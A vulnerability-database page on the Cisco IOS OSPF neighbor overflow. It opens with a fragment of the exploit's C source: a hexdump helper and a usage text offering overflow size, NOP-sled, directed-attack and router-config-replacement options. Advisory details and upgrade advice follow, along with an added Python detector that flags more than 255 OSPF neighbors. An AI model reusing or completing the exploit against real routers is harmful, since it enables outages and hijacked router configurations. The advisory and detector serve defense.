 * obviously stolen by FX from nmap (util.c)*/
void hexdump(unsigned char *bp, unsigned int length) {

  /* stolen from tcpdump, then kludged extensively */

  static const char asciify[] = "................................ !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~.................................................................................................................................";

  register const u_short *sp;
  register const u_char *ap;
  register u_int i, j;
  register int nshorts, nshorts2;
  register int padding;

  printf("\n\t");
  padding = 0;
  sp = (u_short *)bp;
  ap = (u_char *)bp;
  nshorts = (u_int) length / sizeof(u_short);
  nshorts2 = (u_int) length / sizeof(u_short);
  i = 0;
  j = 0;
  while(1) {
    while (--nshorts >= 0) {
      printf(" %04x", ntohs(*sp));
      sp++;
      if ((++i % 8) == 0)
        break;
    }
    if (nshorts < 0) {
      if ((length & 1) && (((i-1) % 8) != 0)) {
        printf(" %02x  ", *(u_char *)sp);
        padding++;
      }
      nshorts = (8 - (nshorts2 - nshorts));
      while(--nshorts >= 0) {
        printf("     ");
      }
      if (!padding) printf("     ");
    }
    printf("  ");

    while (--nshorts2 >= 0) {
      printf("%c%c", asciify[*ap], asciify[*(ap+1)]);
      ap += 2;
      if ((++j % 8) == 0) {
        printf("\n\t");
        break;
      }
    }
    if (nshorts2 < 0) {
      if ((length & 1) && (((j-1) % 8) != 0)) {
        printf("%c", asciify[*ap]);
      }
      break;
    }
  }
  if ((length & 1) && (((i-1) % 8) == 0)) {
    printf(" %02x", *(u_char *)sp);
    printf("                                       %c", asciify[*ap]);
  }
  printf("\n");
}

void usage(char *s) {
    int		i;

    fprintf(stderr,"Usage: \n"
	    "%s -s <src net> -n <src mask> -d <target rtr ip> -f <file>"
		" -t <targ#>\n"
	    "Options:\n"
	    "-s <src net>  Use this network as source (as in target config)\n"
	    "-n <src mask> Use this netmask as source (as in target config)\n"
	    "-d <target>   This is the target router interface IP\n"
	    "-f <file>     Use this as the new config for the router\n"
	    "-t #          Use this target value set (see below)\n"
	    "-a <area>     Use this OSPF area\n"
	    "-v            Be verbose (-vv or -vvv recommended)\n"
	    "-D            Directed attack (unicast) for 11.x targets\n"
	    "-T            Test only - don't send\n"
	    " --- barely used options ---\n"
	    "-L #          Number of neighbors to announce (overflow size)\n"
	    "-F #          Start of data (seen reverse to overflow)\n"
	    "-S #          NOP sleet\n"
	    "\n"
	    "Known targets:\n"
	    ,s);
    
    for (i=0;i<=TARGETS;i++) 
	fprintf(stderr,"\t%s\n",targets[i].description);

    exit (1);
}
		

- Vulnerability Information

6455
Cisco IOS OSPF Neighbor Announcement Remote Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Unknown

- Vulnerability Description

A remote overflow exists in Cisco IOS. The operating system fails to gracefully handle more than 255 Open Shortest Path First (OSPF) neighbors on an interface, resulting in a buffer overflow. With a specially crafted request, an attacker can cause denial of service, command execution, or manipulate the router's configuration, resulting in a loss of integrity and/or availability.
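The condition named above, more than 255 OSPF neighbors on one interface, is visible on the wire: each spoofed neighbor in the attached exploit arrives as its own OSPFv2 Hello carrying a distinct router ID. What follows is an added detection example, not code from this page or from Phenoelit. It parses raw IPv4/OSPF Hello datagrams using the RFC 2328 field layout, verifies the OSPF checksum, groups router IDs by destination address (a stand-in for the ingress interface a real capture would give you), and flags any group that exceeds the limit. The sample datagrams it builds are constructed test data; NEIGHBOR_LIMIT, the 10.0.0.0/16 and 192.168.0.0 address ranges, and all function names are assumptions of this example.

```python
import socket
import struct
from collections import defaultdict

IPPROTO_OSPF = 89
OSPF_HELLO_TYPE = 1
# Per-interface neighbor count the advisory says affected IOS releases mishandle
# (assumed threshold for this example; tune it to your topology).
NEIGHBOR_LIMIT = 255

# OSPFv2 header, RFC 2328 A.3.1: version, type, packet length, router ID,
# area ID, checksum, AuType, 64-bit authentication field.
OSPF_HDR = struct.Struct("!BBH4s4sHH8s")
# Hello body, RFC 2328 A.3.2: network mask, HelloInterval, options,
# router priority, RouterDeadInterval, designated router, backup DR.
OSPF_HELLO = struct.Struct("!4sHBBI4s4s")


def ones_complement_sum(data: bytes) -> int:
    """Internet checksum (RFC 1071); the same arithmetic the page's chksum() implements."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ospf_checksum(ospf: bytes) -> int:
    """RFC 2328 D.4.1: checksum over the OSPF packet with the checksum field
    (bytes 12-13) zeroed and the authentication field (bytes 16-23) excluded."""
    covered = ospf[:12] + b"\x00\x00" + ospf[14:16] + ospf[24:]
    return ones_complement_sum(covered)


def parse_ospf_hello(pkt: bytes):
    """Return a dict describing an OSPF Hello carried in a raw IPv4 datagram,
    or None if it is not a well-formed Hello with a valid checksum."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    if ihl < 20 or pkt[9] != IPPROTO_OSPF or len(pkt) < ihl + OSPF_HDR.size:
        return None
    ospf = pkt[ihl:]
    version, ptype, length, rid, area, cksum, _autype, _auth = OSPF_HDR.unpack_from(ospf)
    if version != 2 or ptype != OSPF_HELLO_TYPE:
        return None
    if length < OSPF_HDR.size + OSPF_HELLO.size or length > len(ospf):
        return None
    body = ospf[:length]
    if ospf_checksum(body) != cksum:
        return None
    _mask, hello_int, _opts, _prio, dead_int, _dr, _bdr = OSPF_HELLO.unpack_from(body, OSPF_HDR.size)
    return {
        "src": socket.inet_ntoa(pkt[12:16]),
        "dst": socket.inet_ntoa(pkt[16:20]),
        "router_id": socket.inet_ntoa(rid),
        "area": socket.inet_ntoa(area),
        "hello_interval": hello_int,
        "dead_interval": dead_int,
    }


def count_neighbors(packets):
    """Distinct Hello router IDs seen per destination address.  The destination
    stands in for the receiving interface; a real capture would key on ingress port."""
    seen = defaultdict(set)
    for pkt in packets:
        hello = parse_ospf_hello(pkt)
        if hello is not None:
            seen[hello["dst"]].add(hello["router_id"])
    return seen


def flag_excess(seen, limit=NEIGHBOR_LIMIT):
    """Destinations whose distinct-neighbor count exceeds the limit."""
    return {dst: len(rids) for dst, rids in seen.items() if len(rids) > limit}


def build_hello(src_ip, dst_ip, router_id: bytes, area=b"\x00\x00\x00\x00"):
    """Construct a minimal IPv4 + OSPF Hello datagram (test data only; the IP
    header checksum is left zero because the parser does not verify it)."""
    hello = OSPF_HELLO.pack(b"\xff\xff\xff\x00", 10, 0x02, 1, 40,
                            socket.inet_aton(src_ip), b"\x00" * 4)
    length = OSPF_HDR.size + len(hello)
    hdr = OSPF_HDR.pack(2, OSPF_HELLO_TYPE, length, router_id, area, 0, 0, b"\x00" * 8)
    cksum = ospf_checksum(hdr + hello)
    hdr = OSPF_HDR.pack(2, OSPF_HELLO_TYPE, length, router_id, area, cksum, 0, b"\x00" * 8)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + length, 0, 0, 1, IPPROTO_OSPF, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    return ip + hdr + hello


def demo(n_neighbors=300, target="10.0.0.1"):
    """Simulate n distinct neighbors announcing toward one target, then run detection."""
    pkts = [build_hello("10.0.%d.%d" % (i >> 8, i & 0xFF), target,
                        struct.pack("!I", 0xC0A80000 + i))
            for i in range(1, n_neighbors + 1)]
    pkts.append(b"\x45" + b"\x00" * 19)  # constructed non-OSPF datagram, ignored
    return flag_excess(count_neighbors(pkts))


if __name__ == "__main__":
    print(demo())  # {'10.0.0.1': 300}
```

A hit from flag_excess is a reason to compare the wire view against the router's own neighbor table (show ip ospf neighbor on IOS) and to schedule the upgrade named in the Solution section. Keying on destination address also covers the exploit's non-directed mode, where every Hello goes to 224.0.0.5.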

- Timeline

2003-02-20 Unknown
2003-02-20 Unknown

- Solution

Upgrade to version 12.0(19)S, 12.0(19)ST, 12.1(1), 12.1(1)DB, 12.1(1)DC, 12.1(1)T or higher, as this has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability Author

About the SCAP Chinese Community

The SCAP Chinese Community is the first open Chinese-language community in China devoted to SCAP. For more information, see [About this site].

Copyright Notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are hosted on MITRE's websites.